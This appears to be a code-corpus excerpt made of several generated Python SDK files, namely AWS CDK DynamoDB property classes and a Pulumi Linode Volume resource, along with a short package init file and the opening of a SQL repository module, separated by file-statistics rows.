"scale_in_cooldown": "scaleInCooldown",
"scale_out_cooldown": "scaleOutCooldown",
"target_utilization_percent": "targetUtilizationPercent",
},
)
class UtilizationScalingProps(
aws_cdk.aws_applicationautoscaling.BaseTargetTrackingProps
):
def __init__(
self,
*,
disable_scale_in: typing.Optional[bool] = None,
policy_name: typing.Optional[str] = None,
scale_in_cooldown: typing.Optional[aws_cdk.core.Duration] = None,
scale_out_cooldown: typing.Optional[aws_cdk.core.Duration] = None,
target_utilization_percent: jsii.Number,
) -> None:
"""Properties for enabling DynamoDB utilization tracking.
:param disable_scale_in: Indicates whether scale in by the target tracking policy is disabled. If the value is true, scale in is disabled and the target tracking policy won't remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking policy can remove capacity from the scalable resource. Default: false
:param policy_name: A name for the scaling policy. Default: - Automatically generated name.
:param scale_in_cooldown: Period after a scale in activity completes before another scale in activity can start. Default: Duration.seconds(300) for the following scalable targets: ECS services, Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters, Amazon SageMaker endpoint variants, Custom resources. For all other scalable targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB global secondary indexes, Amazon Comprehend document classification endpoints, Lambda provisioned concurrency
:param scale_out_cooldown: Period after a scale out activity completes before another scale out activity can start. Default: Duration.seconds(300) for the following scalable targets: ECS services, Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters, Amazon SageMaker endpoint variants, Custom resources. For all other scalable targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB global secondary indexes, Amazon Comprehend document classification endpoints, Lambda provisioned concurrency
:param target_utilization_percent: Target utilization percentage for the attribute.
"""
self._values = {
"target_utilization_percent": target_utilization_percent,
}
if disable_scale_in is not None:
self._values["disable_scale_in"] = disable_scale_in
if policy_name is not None:
self._values["policy_name"] = policy_name
if scale_in_cooldown is not None:
self._values["scale_in_cooldown"] = scale_in_cooldown
if scale_out_cooldown is not None:
self._values["scale_out_cooldown"] = scale_out_cooldown
@builtins.property
def disable_scale_in(self) -> typing.Optional[bool]:
"""Indicates whether scale in by the target tracking policy is disabled.
If the value is true, scale in is disabled and the target tracking policy
won't remove capacity from the scalable resource. Otherwise, scale in is
enabled and the target tracking policy can remove capacity from the
scalable resource.
default
:default: false
"""
return self._values.get("disable_scale_in")
@builtins.property
def policy_name(self) -> typing.Optional[str]:
"""A name for the scaling policy.
default
:default: - Automatically generated name.
"""
return self._values.get("policy_name")
@builtins.property
def scale_in_cooldown(self) -> typing.Optional[aws_cdk.core.Duration]:
"""Period after a scale in activity completes before another scale in activity can start.
default
:default:
Duration.seconds(300) for the following scalable targets: ECS services,
Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters,
Amazon SageMaker endpoint variants, Custom resources. For all other scalable
targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB
global secondary indexes, Amazon Comprehend document classification endpoints,
Lambda provisioned concurrency
"""
return self._values.get("scale_in_cooldown")
@builtins.property
def scale_out_cooldown(self) -> typing.Optional[aws_cdk.core.Duration]:
"""Period after a scale out activity completes before another scale out activity can start.
default
:default:
Duration.seconds(300) for the following scalable targets: ECS services,
Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters,
Amazon SageMaker endpoint variants, Custom resources. For all other scalable
targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB
global secondary indexes, Amazon Comprehend document classification endpoints,
Lambda provisioned concurrency
"""
return self._values.get("scale_out_cooldown")
@builtins.property
def target_utilization_percent(self) -> jsii.Number:
"""Target utilization percentage for the attribute."""
return self._values.get("target_utilization_percent")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "UtilizationScalingProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.GlobalSecondaryIndexProps",
jsii_struct_bases=[SecondaryIndexProps],
name_mapping={
"index_name": "indexName",
"non_key_attributes": "nonKeyAttributes",
"projection_type": "projectionType",
"partition_key": "partitionKey",
"read_capacity": "readCapacity",
"sort_key": "sortKey",
"write_capacity": "writeCapacity",
},
)
class GlobalSecondaryIndexProps(SecondaryIndexProps):
def __init__(
self,
*,
index_name: str,
non_key_attributes: typing.Optional[typing.List[str]] = None,
projection_type: typing.Optional["ProjectionType"] = None,
partition_key: "Attribute",
read_capacity: typing.Optional[jsii.Number] = None,
sort_key: typing.Optional["Attribute"] = None,
write_capacity: typing.Optional[jsii.Number] = None,
) -> None:
"""Properties for a global secondary index.
:param index_name: The name of the secondary index.
:param non_key_attributes: The non-key attributes that are projected into the secondary index. Default: - No additional attributes
:param projection_type: The set of attributes that are projected into the secondary index. Default: ALL
:param partition_key: The attribute of a partition key for the global secondary index.
:param read_capacity: The read capacity for the global secondary index. Can only be provided if table billingMode is Provisioned or undefined. Default: 5
:param sort_key: The attribute of a sort key for the global secondary index. Default: - No sort key
:param write_capacity: The write capacity for the global secondary index. Can only be provided if table billingMode is Provisioned or undefined. Default: 5
"""
if isinstance(partition_key, dict):
partition_key = Attribute(**partition_key)
if isinstance(sort_key, dict):
sort_key = Attribute(**sort_key)
self._values = {
"index_name": index_name,
"partition_key": partition_key,
}
if non_key_attributes is not None:
self._values["non_key_attributes"] = non_key_attributes
if projection_type is not None:
self._values["projection_type"] = projection_type
if read_capacity is not None:
self._values["read_capacity"] = read_capacity
if sort_key is not None:
self._values["sort_key"] = sort_key
if write_capacity is not None:
self._values["write_capacity"] = write_capacity
@builtins.property
def index_name(self) -> str:
"""The name of the secondary index."""
return self._values.get("index_name")
@builtins.property
def non_key_attributes(self) -> typing.Optional[typing.List[str]]:
"""The non-key attributes that are projected into the secondary index.
default
:default: - No additional attributes
"""
return self._values.get("non_key_attributes")
@builtins.property
def projection_type(self) -> typing.Optional["ProjectionType"]:
"""The set of attributes that are projected into the secondary index.
default
:default: ALL
"""
return self._values.get("projection_type")
@builtins.property
def partition_key(self) -> "Attribute":
"""The attribute of a partition key for the global secondary index."""
return self._values.get("partition_key")
@builtins.property
def read_capacity(self) -> typing.Optional[jsii.Number]:
"""The read capacity for the global secondary index.
Can only be provided if table billingMode is Provisioned or undefined.
default
:default: 5
"""
return self._values.get("read_capacity")
@builtins.property
def sort_key(self) -> typing.Optional["Attribute"]:
"""The attribute of a sort key for the global secondary index.
default
:default: - No sort key
"""
return self._values.get("sort_key")
@builtins.property
def write_capacity(self) -> typing.Optional[jsii.Number]:
"""The write capacity for the global secondary index.
Can only be provided if table billingMode is Provisioned or undefined.
default
:default: 5
"""
return self._values.get("write_capacity")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "GlobalSecondaryIndexProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.LocalSecondaryIndexProps",
jsii_struct_bases=[SecondaryIndexProps],
name_mapping={
"index_name": "indexName",
"non_key_attributes": "nonKeyAttributes",
"projection_type": "projectionType",
"sort_key": "sortKey",
},
)
class LocalSecondaryIndexProps(SecondaryIndexProps):
def __init__(
self,
*,
index_name: str,
non_key_attributes: typing.Optional[typing.List[str]] = None,
projection_type: typing.Optional["ProjectionType"] = None,
sort_key: "Attribute",
) -> None:
"""Properties for a local secondary index.
:param index_name: The name of the secondary index.
:param non_key_attributes: The non-key attributes that are projected into the secondary index. Default: - No additional attributes
:param projection_type: The set of attributes that are projected into the secondary index. Default: ALL
:param sort_key: The attribute of a sort key for the local secondary index.
"""
if isinstance(sort_key, dict):
sort_key = Attribute(**sort_key)
self._values = {
"index_name": index_name,
"sort_key": sort_key,
}
if non_key_attributes is not None:
self._values["non_key_attributes"] = non_key_attributes
if projection_type is not None:
self._values["projection_type"] = projection_type
@builtins.property
def index_name(self) -> str:
"""The name of the secondary index."""
return self._values.get("index_name")
@builtins.property
def non_key_attributes(self) -> typing.Optional[typing.List[str]]:
"""The non-key attributes that are projected into the secondary index.
default
:default: - No additional attributes
"""
return self._values.get("non_key_attributes")
@builtins.property
def projection_type(self) -> typing.Optional["ProjectionType"]:
"""The set of attributes that are projected into the secondary index.
default
:default: ALL
"""
return self._values.get("projection_type")
@builtins.property
def sort_key(self) -> "Attribute":
"""The attribute of a sort key for the local secondary index."""
return self._values.get("sort_key")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "LocalSecondaryIndexProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
__all__ = [
"Attribute",
"AttributeType",
"BillingMode",
"CfnTable",
"CfnTableProps",
"EnableScalingProps",
"GlobalSecondaryIndexProps",
"IScalableTableAttribute",
"ITable",
"LocalSecondaryIndexProps",
"ProjectionType",
"SecondaryIndexProps",
"StreamViewType",
"Table",
"TableAttributes",
"TableEncryption",
"TableOptions",
"TableProps",
"UtilizationScalingProps",
]
publication.publish()
| 44.894991 | 545 | 0.661849 | 22,825 | 195,383 | 5.540022 | 0.032158 | 0.040854 | 0.011744 | 0.021257 | 0.877739 | 0.858514 | 0.843157 | 0.828439 | 0.81698 | 0.807404 | 0 | 0.001559 | 0.241797 | 195,383 | 4,351 | 546 | 44.905309 | 0.852032 | 0.45117 | 0 | 0.74979 | 0 | 0 | 0.132557 | 0.066108 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116709 | false | 0 | 0.005877 | 0.026868 | 0.236776 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
612a2adbb6f54f7068ca124331205538b8b49847 | 22,043 | py | Python | sdk/python/pulumi_linode/volume.py | pulumi/pulumi-linode | dcdc078ddcad836dddf6f31879f0f0488bec33b4 | [
"ECL-2.0",
"Apache-2.0"
] | 18 | 2019-05-02T21:14:37.000Z | 2021-12-19T18:37:40.000Z | sdk/python/pulumi_linode/volume.py | pulumi/pulumi-linode | dcdc078ddcad836dddf6f31879f0f0488bec33b4 | [
"ECL-2.0",
"Apache-2.0"
] | 79 | 2019-05-01T17:52:03.000Z | 2022-03-31T15:31:56.000Z | sdk/python/pulumi_linode/volume.py | pulumi/pulumi-linode | dcdc078ddcad836dddf6f31879f0f0488bec33b4 | [
"ECL-2.0",
"Apache-2.0"
] | 6 | 2019-05-02T00:37:23.000Z | 2021-05-04T11:10:40.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['VolumeArgs', 'Volume']
@pulumi.input_type
class VolumeArgs:
def __init__(__self__, *,
label: pulumi.Input[str],
region: pulumi.Input[str],
linode_id: Optional[pulumi.Input[int]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Volume resource.
:param pulumi.Input[str] label: The label of the Linode Volume
:param pulumi.Input[str] region: The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
:param pulumi.Input[int] linode_id: The ID of a Linode Instance where the Volume should be attached.
:param pulumi.Input[int] size: Size of the Volume in GB.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
"""
pulumi.set(__self__, "label", label)
pulumi.set(__self__, "region", region)
if linode_id is not None:
pulumi.set(__self__, "linode_id", linode_id)
if size is not None:
pulumi.set(__self__, "size", size)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def label(self) -> pulumi.Input[str]:
"""
The label of the Linode Volume
"""
return pulumi.get(self, "label")
@label.setter
def label(self, value: pulumi.Input[str]):
pulumi.set(self, "label", value)
@property
@pulumi.getter
def region(self) -> pulumi.Input[str]:
"""
The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: pulumi.Input[str]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="linodeId")
def linode_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of a Linode Instance where the Volume should be attached.
"""
return pulumi.get(self, "linode_id")
@linode_id.setter
def linode_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "linode_id", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
Size of the Volume in GB.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tags applied to this object. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _VolumeState:
def __init__(__self__, *,
filesystem_path: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
linode_id: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering Volume resources.
:param pulumi.Input[str] filesystem_path: The full filesystem path for the Volume based on the Volume's label. Path is /dev/disk/by-id/scsi-0Linode_Volume_ +
Volume label.
:param pulumi.Input[str] label: The label of the Linode Volume
:param pulumi.Input[int] linode_id: The ID of a Linode Instance where the Volume should be attached.
:param pulumi.Input[str] region: The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
:param pulumi.Input[int] size: Size of the Volume in GB.
:param pulumi.Input[str] status: The status of the volume, indicating the current readiness state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
"""
if filesystem_path is not None:
pulumi.set(__self__, "filesystem_path", filesystem_path)
if label is not None:
pulumi.set(__self__, "label", label)
if linode_id is not None:
pulumi.set(__self__, "linode_id", linode_id)
if region is not None:
pulumi.set(__self__, "region", region)
if size is not None:
pulumi.set(__self__, "size", size)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="filesystemPath")
def filesystem_path(self) -> Optional[pulumi.Input[str]]:
"""
The full filesystem path for the Volume based on the Volume's label. Path is /dev/disk/by-id/scsi-0Linode_Volume_ +
Volume label.
"""
return pulumi.get(self, "filesystem_path")
@filesystem_path.setter
def filesystem_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filesystem_path", value)
@property
@pulumi.getter
def label(self) -> Optional[pulumi.Input[str]]:
"""
The label of the Linode Volume
"""
return pulumi.get(self, "label")
@label.setter
def label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label", value)
@property
@pulumi.getter(name="linodeId")
def linode_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of a Linode Instance where the Volume should be attached.
"""
return pulumi.get(self, "linode_id")
@linode_id.setter
def linode_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "linode_id", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
Size of the Volume in GB.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The status of the volume, indicating the current readiness state.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tags applied to this object. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class Volume(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
label: Optional[pulumi.Input[str]] = None,
linode_id: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Provides a Linode Volume resource. This can be used to create, modify, and delete Linodes Block Storage Volumes. Block Storage Volumes are removable storage disks that persist outside the life-cycle of Linode Instances. These volumes can be attached to and detached from Linode instances throughout a region.
For more information, see [How to Use Block Storage with Your Linode](https://www.linode.com/docs/platform/block-storage/how-to-use-block-storage-with-your-linode/) and the [Linode APIv4 docs](https://developers.linode.com/api/v4#operation/createVolume).
## Example Usage
The following example shows how one might use this resource to configure a Block Storage Volume attached to a Linode Instance.
```python
import pulumi
import pulumi_linode as linode
foobaz = linode.Instance("foobaz",
root_pass="3X4mp13",
type="g6-nanode-1",
region="us-west",
tags=["foobaz"])
foobar = linode.Volume("foobar",
label="foo-volume",
region=foobaz.region,
linode_id=foobaz.id)
```
Volumes can also be attached using the Linode Instance config device map.
```python
import pulumi
import pulumi_linode as linode
foo = linode.Instance("foo",
configs=[linode.InstanceConfigArgs(
devices=linode.InstanceConfigDevicesArgs(
sda=linode.InstanceConfigDevicesSdaArgs(
volume_id=123,
),
),
kernel="linode/latest-64bit",
label="boot-existing-volume",
)],
region="us-east",
type="g6-nanode-1")
```
## Attributes
This resource exports the following attributes:
* `status` - The status of the Linode Volume. (`creating`, `active`, `resizing`, `contact_support`)
* `filesystem_path` - The full filesystem path for the Volume based on the Volume's label. The path is "/dev/disk/by-id/scsi-0Linode_Volume_" + the Volume label
## Import
Linodes Volumes can be imported using the Linode Volume `id`, e.g.
```sh
$ pulumi import linode:index/volume:Volume myvolume 1234567
```
The Linode Guide, [Import Existing Infrastructure to Terraform](https://www.linode.com/docs/applications/configuration-management/import-existing-infrastructure-to-terraform/), offers resource importing examples for Block Storage Volumes and other Linode resource types.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] label: The label of the Linode Volume
:param pulumi.Input[int] linode_id: The ID of a Linode Instance where the Volume should be attached.
:param pulumi.Input[str] region: The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
:param pulumi.Input[int] size: Size of the Volume in GB.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VolumeArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Linode Volume resource. This can be used to create, modify, and delete Linodes Block Storage Volumes. Block Storage Volumes are removable storage disks that persist outside the life-cycle of Linode Instances. These volumes can be attached to and detached from Linode instances throughout a region.
For more information, see [How to Use Block Storage with Your Linode](https://www.linode.com/docs/platform/block-storage/how-to-use-block-storage-with-your-linode/) and the [Linode APIv4 docs](https://developers.linode.com/api/v4#operation/createVolume).
## Example Usage
The following example shows how one might use this resource to configure a Block Storage Volume attached to a Linode Instance.
```python
import pulumi
import pulumi_linode as linode
foobaz = linode.Instance("foobaz",
root_pass="3X4mp13",
type="g6-nanode-1",
region="us-west",
tags=["foobaz"])
foobar = linode.Volume("foobar",
label="foo-volume",
region=foobaz.region,
linode_id=foobaz.id)
```
Volumes can also be attached using the Linode Instance config device map.
```python
import pulumi
import pulumi_linode as linode
foo = linode.Instance("foo",
configs=[linode.InstanceConfigArgs(
devices=linode.InstanceConfigDevicesArgs(
sda=linode.InstanceConfigDevicesSdaArgs(
volume_id=123,
),
),
kernel="linode/latest-64bit",
label="boot-existing-volume",
)],
region="us-east",
type="g6-nanode-1")
```
## Attributes
This resource exports the following attributes:
* `status` - The status of the Linode Volume. (`creating`, `active`, `resizing`, `contact_support`)
* `filesystem_path` - The full filesystem path for the Volume based on the Volume's label. The path is "/dev/disk/by-id/scsi-0Linode_Volume_" + the Volume label
## Import
Linodes Volumes can be imported using the Linode Volume `id`, e.g.
```sh
$ pulumi import linode:index/volume:Volume myvolume 1234567
```
The Linode Guide, [Import Existing Infrastructure to Terraform](https://www.linode.com/docs/applications/configuration-management/import-existing-infrastructure-to-terraform/), offers resource importing examples for Block Storage Volumes and other Linode resource types.
:param str resource_name: The name of the resource.
:param VolumeArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VolumeArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
label: Optional[pulumi.Input[str]] = None,
linode_id: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VolumeArgs.__new__(VolumeArgs)
if label is None and not opts.urn:
raise TypeError("Missing required property 'label'")
__props__.__dict__["label"] = label
__props__.__dict__["linode_id"] = linode_id
if region is None and not opts.urn:
raise TypeError("Missing required property 'region'")
__props__.__dict__["region"] = region
__props__.__dict__["size"] = size
__props__.__dict__["tags"] = tags
__props__.__dict__["filesystem_path"] = None
__props__.__dict__["status"] = None
super(Volume, __self__).__init__(
'linode:index/volume:Volume',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
filesystem_path: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
linode_id: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'Volume':
"""
Get an existing Volume resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] filesystem_path: The full filesystem path for the Volume based on the Volume's label. Path is /dev/disk/by-id/scsi-0Linode_Volume_ +
Volume label.
:param pulumi.Input[str] label: The label of the Linode Volume
:param pulumi.Input[int] linode_id: The ID of a Linode Instance where the Volume should be attached.
:param pulumi.Input[str] region: The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
:param pulumi.Input[int] size: Size of the Volume in GB.
:param pulumi.Input[str] status: The status of the volume, indicating the current readiness state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _VolumeState.__new__(_VolumeState)
__props__.__dict__["filesystem_path"] = filesystem_path
__props__.__dict__["label"] = label
__props__.__dict__["linode_id"] = linode_id
__props__.__dict__["region"] = region
__props__.__dict__["size"] = size
__props__.__dict__["status"] = status
__props__.__dict__["tags"] = tags
return Volume(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="filesystemPath")
def filesystem_path(self) -> pulumi.Output[str]:
"""
The full filesystem path for the Volume based on the Volume's label. Path is /dev/disk/by-id/scsi-0Linode_Volume_ +
Volume label.
"""
return pulumi.get(self, "filesystem_path")
@property
@pulumi.getter
def label(self) -> pulumi.Output[str]:
"""
The label of the Linode Volume
"""
return pulumi.get(self, "label")
@property
@pulumi.getter(name="linodeId")
def linode_id(self) -> pulumi.Output[int]:
"""
The ID of a Linode Instance where the Volume should be attached.
"""
return pulumi.get(self, "linode_id")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter
def size(self) -> pulumi.Output[int]:
"""
Size of the Volume in GB.
"""
return pulumi.get(self, "size")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The status of the volume, indicating the current readiness state.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of tags applied to this object. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
| 42.885214 | 318 | 0.62682 | 2,700 | 22,043 | 4.977037 | 0.095926 | 0.076946 | 0.055217 | 0.032743 | 0.867465 | 0.847448 | 0.821104 | 0.803468 | 0.799673 | 0.781143 | 0 | 0.003574 | 0.263848 | 22,043 | 513 | 319 | 42.968811 | 0.824552 | 0.462505 | 0 | 0.668067 | 1 | 0 | 0.068102 | 0.002522 | 0 | 0 | 0 | 0 | 0 | 1 | 0.159664 | false | 0.004202 | 0.021008 | 0 | 0.277311 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b66383d14192d4ee1ec486595d3939646fe1688b | 123 | py | Python | S5_HumanPoseEstimation/src/__init__.py | EVA4-RS-Group/Phase2 | 7c551e3894979cc425dd51baeddbfa5a51b7878d | [
"Apache-2.0"
] | null | null | null | S5_HumanPoseEstimation/src/__init__.py | EVA4-RS-Group/Phase2 | 7c551e3894979cc425dd51baeddbfa5a51b7878d | [
"Apache-2.0"
] | null | null | null | S5_HumanPoseEstimation/src/__init__.py | EVA4-RS-Group/Phase2 | 7c551e3894979cc425dd51baeddbfa5a51b7878d | [
"Apache-2.0"
] | 2 | 2020-08-26T02:33:33.000Z | 2021-03-16T10:51:40.000Z | from .config import *
from .inference import *
from .inference_onnx import *
from .pose_resnet import *
from .loss import * | 24.6 | 29 | 0.764228 | 17 | 123 | 5.411765 | 0.470588 | 0.434783 | 0.413043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154472 | 123 | 5 | 30 | 24.6 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1e33d8d011c6d736a3545d4965716342cd10d0cd | 19,835 | py | Python | main/modeles/repositories/vmObservationsMaillesRepository.py | Splendens/atlas_biodiv_pdl | eff4bcc9193b76462ede0365b9faec3e0706d5d8 | [
"BSD-2-Clause"
] | 3 | 2018-07-31T14:30:18.000Z | 2020-11-21T06:43:18.000Z | main/modeles/repositories/vmObservationsMaillesRepository.py | Splendens/atlas_biodiv_pdl | eff4bcc9193b76462ede0365b9faec3e0706d5d8 | [
"BSD-2-Clause"
] | null | null | null | main/modeles/repositories/vmObservationsMaillesRepository.py | Splendens/atlas_biodiv_pdl | eff4bcc9193b76462ede0365b9faec3e0706d5d8 | [
"BSD-2-Clause"
] | 2 | 2018-11-23T10:00:30.000Z | 2018-11-23T22:33:11.000Z |
# -*- coding:utf-8 -*-
from .. import utils
from sqlalchemy.sql import text
from main.configuration import config
import ast
def getObservationsMaillesChilds(connection, cd_ref):
if config.GROS_JEU_DONNEES:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
